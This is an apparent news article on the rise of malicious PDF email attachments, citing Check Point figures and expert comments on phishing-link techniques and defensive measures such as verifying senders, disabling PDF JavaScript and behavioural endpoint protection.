What makes PDF files attractive to threat actors?

In recent months, there has been a rising trend in threat actors employing Portable Document Format (PDF) documents to gain access through email attacks. While the exploitation of PDF files as a malicious tool is not a new tactic, its prevalence has surged as cybercriminals continue to refine their methods to evade traditional security measures.

In a blog published on April 4, cyber-security firm Checkpoint reported that 22% of malicious email attachments are now PDFs, a significant rise given that 68% of attacks originate through email. This is concerning as over 400 billion PDF files were opened last year and 87% of organisations use PDFs as a standard format, making them ideal vehicles for concealing malicious code.

PDF files as a lure to threat actors

Developed by Adobe in 1992, PDF files are widely used and accepted as a standard format for sharing and distributing information among users and organisations, with most modern devices and operating systems having built-in PDF readers. This ubiquity makes PDFs an attractive initial access vector for attackers as they can be easily distributed regardless of platform resulting in higher phishing click rates compared to other methods.

Trustworthiness is another reason. PDF documents are often perceived as trustworthy and safe to open, particularly when received from a trusted source, which makes it easier for attackers to trick victims into opening malicious PDF documents, believe researchers.

Furthermore, PDF documents are often used for legitimate purposes and can contain complex data structures that make them difficult for security teams and software to analyse and detect. Prateek Bhajanka, CEO and Founder of IT security consulting firm Field CISO Advisory said that this complexity creates a CAPTCHA-like effect — documents appear normal to human users while being difficult for automated security systems to analyse correctly.

What techniques are cyber-goons employing?

In the past, attackers relied on vulnerabilities in PDF readers (Common Vulnerabilities and Exposures – CVEs) to exploit flaws in software. However, as PDF readers have improved their security—particularly browsers that now open PDFs by default—this method has become less effective. Consequently, cybercriminals have shifted tactics to rely more on social engineering and hidden malicious links, making it even harder to detect these attacks, explained Elad Pas head R&D and Sharon ben Moshe, Malware Analyst, at Check Point Software and blog authors.

For example, one of the most common attack methods involves embedding malicious links within PDFs. These files often mimic trusted documents from well-known brands such as Amazon, DocuSign, or Acrobat Reader. When recipients click the links, they are redirected to phishing sites or malware-laden downloads.

Unlike traditional exploits that rely on software vulnerabilities, link-based PDF attacks are highly effective because they require human interaction. This makes them harder to detect with automated security solutions, which struggle to interpret links in the same way a human would. According to the researchers, threat actors frequently modify the links, images, and content within PDFs to evade detection by security tools that rely on static signatures or URL reputation databases, they said.

Additionally, attackers may use encryption and hidden objects within PDFs to obscure malicious code, complicating the analysis of the file’s true contents.

Mitigating the risks of PDF attacks

As cyber-attackers continuously enhance their methods, organisations and individuals need to adopt proactive strategies to reduce risk. “Passive security is no longer enough. While prevention is essential, rapid response is critical,” John Shier, Field CTO of Threat Intelligence, at Sophos said while explaining the shift in the landscape of cyber-attacks.

As noted by Pas and Moshe, it is crucial to always verify the sender's identity. “Even if a PDF appears to be authentic, it is important to confirm the sender's email address. Cybercriminals frequently impersonate reputable brands or colleagues to deceive recipients into trusting the document,” the researchers said.

Users should be wary of shortened links or those that utilise redirect services such as Bing, LinkedIn, or Google AMP, said the researchers. Also, they should opt for a secure PDF viewer, as modern browsers and PDF readers typically incorporate built-in security features. It is vital to keep these tools updated and to avoid opening PDFs in obscure or outdated software.

Disabling JavaScript in PDF viewers is also important; if your PDF reader supports JavaScript (which many do), turn it off unless necessary to minimise the risk of script-based attacks. At the gateway level

IT administrators must ensure that systems and security tools are kept up to date. Regular updates to the operating system, browser, and antivirus software are essential, as patches often address vulnerabilities that could be exploited by malicious PDFs, according to Bhajanka.

According to him, “CISOs must focus on behavioural-based protection on endpoints, especially for PDF files, which involves continuously monitoring system activities for unusual patterns, which can indicate malicious activity, and then taking action to block or remediate threats.” This method is effective against zero-day threats, fileless malware, and advanced persistent threats (APTs) that bypass signature-based detection.